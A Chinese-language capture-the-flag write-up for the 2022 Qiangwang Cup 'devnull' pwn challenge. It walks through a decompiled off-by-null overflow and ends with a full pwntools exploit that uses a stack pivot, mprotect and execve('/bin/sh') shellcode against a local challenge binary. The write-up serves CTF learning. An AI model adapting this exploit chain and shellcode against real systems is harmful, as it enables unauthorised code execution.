PWN - [强网杯 2022]devnull writeup

首先查看文件信息：

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3f4000)

使用IDA打开程序，发现程序核心逻辑如下：

int sub_40138F()
{
  char s[32]; // [rsp+0h] [rbp-40h] BYREF
  int fd; // [rsp+20h] [rbp-20h]
  int v3; // [rsp+24h] [rbp-1Ch] BYREF
  void *buf; // [rsp+38h] [rbp-8h]

  sub_401356("/deb/null may cause some error\n");
  stream = fopen("/dev/null", "rb");
  fd = dword_404028;
  if ( !stream )
  {
    sub_401356("error\n");
    exit(1);
  }
  buf = malloc(dword_404010);
  sub_401356("please input your filename\n");
  fgets(s, n, stdin);
  sub_401356("Please write the data you want to discard\n");
  if ( read(fd, &v3, dword_404014) )
  {
    sub_4012B6();
    sub_401356("please input your new data\n");
    if ( !read(fd, buf, dword_404010) )
      exit(1);
    sub_401356("Thanks\n");
    return close(1);
  }
  else
  {
    sub_401356("no junk data?\n");
    sub_401356("please input your new data\n");
    read(0, buf, dword_404010);
    return (unsigned int)sub_4012E0(s, (const char *)buf);
  }
}

首先，fgets(s, n, stdin)处存在off-by-null的栈溢出，可以使得fd最后一个字节为0：

.data:0000000000404014 dword_404014    dd 2Ch                  ; DATA XREF: sub_40138F+B6↑r
.data:0000000000404018 ; int n
.data:0000000000404018 n               dd 21h                  ; DATA XREF: sub_40138F+93↑r
.data:000000000040401C                 align 20h

那么if ( read(fd, &v3, dword_404014) )处则为true，可以从&v3处写入2C字节的数据，从而控制buf的地址，进而控制程序流。

在上述if内部还存在if ( !read(fd, buf, dword_404010) )，我们可以依靠其与buf进行任意地址写。

由于2C字节的限制，我们尝试进行栈迁移，并利用mprotect进而执行shellcode。

exp如下：

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

p = process('./devnull')

gdb.attach(p, "b *0x401436\nc")
pause()

# off-by-null -> fd = 0
p.sendafter(b"please input your filename\n", b"a" * 32)

main = 0x401513
# mov rax, [rbp-0x18]; leave; ret
leave_ret = 0x401350
# leave_ret = 0x401511
ret = 0x40101a
mprotect_ret = 0x4012d0

rw_seg = 0x3FF000
payload = b""
payload += p32(0xdeadbeef) + b"a" * 0x10 + p64(rw_seg) + p64(rw_seg + 0x18) + p64(leave_ret)
p.sendafter(b"Please write the data you want to discard\n", payload)

shellcode = asm('mov rax, 0x3b; mov rdi, 0x3ff008; mov rsi, 0; mov rdx, 0; syscall')

payload2 = b""
payload2 += p64(rw_seg)
payload2 += b"/bin/sh\x00"
payload2 += p64(0xdeadbeef)
# >>> (rw_seg + 0x18)
payload2 += p64(rw_seg + 0x60)
# payload2 += p64(0xdeadbeef)
payload2 += p64(mprotect_ret)
payload2 += p64(0xdeadbeef)
payload2 += p64(rw_seg + 0x40)
payload2 += p64(ret)
payload2 += shellcode
# >>> (rw_seg + 0x60)
p.sendlineafter(b"please input your new data\n", payload2)

p.interactive()